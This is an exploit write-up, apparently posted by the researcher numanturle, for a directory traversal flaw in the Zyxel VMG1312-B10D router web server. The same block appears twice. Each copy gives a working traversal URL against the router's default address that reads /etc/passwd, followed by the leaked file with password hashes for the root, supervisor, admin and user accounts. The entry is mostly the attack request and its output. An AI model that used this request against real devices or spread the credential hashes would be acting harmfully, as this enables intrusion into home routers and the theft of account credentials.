numanturle/Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access

## Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access
# Exploit Title: Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access < 5.13(AAXA.8)C0
# Date: 2018-11-17
# Exploit Author: numan türle @numanturle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0


@modem_gateway = "192.168.1.1" // default address

http://@modem_gateway/../../../../../../../../../../../../etc/passwd

here are the contents :

############################## contents ##############################
nobody:x:99:99:nobody:/nonexistent:/bin/false
root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh
supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh
admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh
user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh
############################## contents ##############################
	# Exploit Title: Zyxel VMG1312-B10D Web Server Directory Traversal Arbitrary File Access < 5.13(AAXA.8)C0
	# Date: 2018-11-17
	# Exploit Author: numan türle @numanturle
	# Vendor Homepage: https://www.zyxel.com/
	# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
	# Tested on: macOS
	# Fixed firmware: 5.13(AAXA.8)C0


	@modem_gateway = "192.168.1.1" // default address

	http://@modem_gateway/../../../../../../../../../../../../etc/passwd

	here are the contents :

	############################## contents ##############################
	nobody:x:99:99:nobody:/nonexistent:/bin/false
	root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh
	supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh
	admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh
	user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh
	############################## contents ##############################